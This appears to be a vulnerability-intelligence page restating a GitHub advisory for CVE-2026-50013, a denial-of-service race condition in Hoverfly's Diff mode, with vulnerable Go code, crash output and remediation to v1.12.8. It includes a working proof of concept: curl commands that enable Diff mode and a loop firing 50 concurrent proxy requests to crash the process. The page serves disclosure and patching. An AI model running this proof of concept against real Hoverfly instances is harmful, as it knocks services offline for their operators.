Hoverfly CVE-2026-50013
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Reachable over the network proxy port with low complexity and no auth or interaction; impact is a full process crash (A:H) with no confidentiality or integrity effect, though it requires the non-default Diff mode.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary:
When Hoverfly is running in Diff mode, the AddDiff() function writes to the shared responsesDiff map without any synchronization (no mutex). When multiple proxy requests are processed concurrently (the normal case for any proxy), the concurrent map writes trigger Go's built-in race detector which causes a fatal error: concurrent map read and map write, immediately killing the entire Hoverfly process. This is trivially exploitable by sending multiple simultaneous requests.
Details:
1. Unsynchronized map access in AddDiff() (core/hoverfly_service.go:417-421):
func (hf *Hoverfly) AddDiff(requestView v2.SimpleRequestDefinitionView, diffReport v2.DiffReport) {
if len(diffReport.DiffEntries) > 0 {
diffs := hf.responsesDiff[requestView] // UNSYNCHRONIZED READ
hf.responsesDiff[requestView] = append(diffs, diffReport) // UNSYNCHRONIZED WRITE
}
}2. This function is called from Diff mode processing, which runs concurrently per request (core/modes/diff_mode.go):
Each incoming proxy request is handled in its own goroutine by Go's net/http server. In Diff mode, each request calls AddDiff() after comparing the simulated and actual responses. With multiple concurrent requests, multiple goroutines write to the same map simultaneously.
3. Go's runtime detects concurrent map access and terminates the process:
Unlike data races on simple values (which produce undefined behavior silently), Go's map implementation includes a built-in concurrent access check. When two goroutines access the same map and at least one is writing, the runtime calls fatal() which is unrecoverable, it cannot be caught by recover().
4. No mutex protection exists on responsesDiff:
The field is declared as a plain map[v2.SimpleRequestDefinitionView][]v2.DiffReport with no associated sync.RWMutex. Compare with hf.state which properly uses sync.RWMutex for its map access.
Environment:
- Hoverfly version: v1.12.7
- Operating System: macOS Darwin 25.4.0
- Go version: 1.26.2
- Configuration: Hoverfly in Diff mode (
PUT /api/v2/hoverfly/mode {"mode":"diff"})
POC:
Step 1: Start Hoverfly and set Diff mode
./hoverfly &
sleep 2
# Set diff mode
curl -X PUT http://localhost:8888/api/v2/hoverfly/mode \
-H "Content-Type: application/json" \
-d '{"mode": "diff"}'
# Load a simulation for diff comparison
curl -X PUT http://localhost:8888/api/v2/simulation \
-H "Content-Type: application/json" \
-d '{
"data": {
"pairs": [{
"request": {"path": [{"matcher": "glob", "value": "*"}]},
"response": {"status": 200, "body": "expected"}
}],
"globalActions": {"delays": [], "delaysLogNormal": []}
},
"meta": {"schemaVersion": "v5.2"}
}'Step 2: Send concurrent requests to trigger the race
# Send 50 concurrent requests, race condition triggers within seconds
for i in $(seq 1 50); do
curl -s -x http://localhost:8500 "http://httpbin.org/get?id=$i" &
done
waitStep 3: Observe the crash
# Check if process is still running
pgrep -f hoverflycrash output on Hoverfly v1.12.7:
fatal error: concurrent map read and map write
goroutine 892 [running]:
github.com/SpectoLabs/hoverfly/core.(*Hoverfly).AddDiff(...)
/core/hoverfly_service.go:419
github.com/SpectoLabs/hoverfly/core/modes.(*DiffMode).Process(...)The process crashes with ~50 concurrent requests. In production with real traffic, it crashes almost immediately.
Impact:
- Full denial of service: The process terminates immediately and cannot be recovered without a restart
- Trivial exploitation: Any attacker with proxy access can trigger this by sending multiple concurrent requests
- No admin API access required: Only proxy port access is needed to trigger the crash
- Unrecoverable:
fatal errorin Go cannot be caught byrecover()- the process is unconditionally killed - Affects all Diff mode users: Any team using Diff mode for API comparison testing is vulnerable
AnalysisAI
Denial of service in Hoverfly's Diff mode (versions ≤ 1.12.7) lets any client with proxy access crash the entire process by sending concurrent requests. The AddDiff() function writes to the shared responsesDiff map without a mutex, so simultaneous proxy requests - the normal case for a proxy - trigger Go's built-in concurrent-map detector, producing an unrecoverable fatal error: concurrent map read and map write that kills the process. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Hoverfly must be running in Diff mode - set explicitly via `PUT /api/v2/hoverfly/mode {"mode":"diff"}` - and a simulation must be loaded so responses actually generate diff entries (only non-empty `diffReport.DiffEntries` reach the unsynchronized append). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | This is a genuine, easy-to-trigger availability issue, not a paper high-CVSS. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker (or even ordinary load) with access to the Hoverfly proxy port on a Diff-mode instance sends a burst of simultaneous requests that produce diff entries; multiple goroutines then write to the unsynchronized `responsesDiff` map at once, Go's runtime detects the concurrent map access and calls the unrecoverable `fatal()`, and the whole Hoverfly process dies and stays down until manually restarted. A working POC exists in the vendor advisory and reliably crashes v1.12.7 with roughly 50 concurrent requests; the network vector and low attack complexity (AV:N/AC:L) mean no special tooling is required. |
| Remediation | Vendor-released patch: upgrade to Hoverfly v1.12.8 (release https://github.com/SpectoLabs/hoverfly/releases/tag/v1.12.8), which adds a dedicated `responsesDiffMu sync.RWMutex` guarding all reads, writes, and range iterations over `responsesDiff` (fix PR https://github.com/SpectoLabs/hoverfly/pull/1227). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours, identify all Hoverfly instances running version 1.12.7 or earlier, particularly those with Diff mode enabled. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-362 – Race Condition
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-qrh4-p6v4-mrfg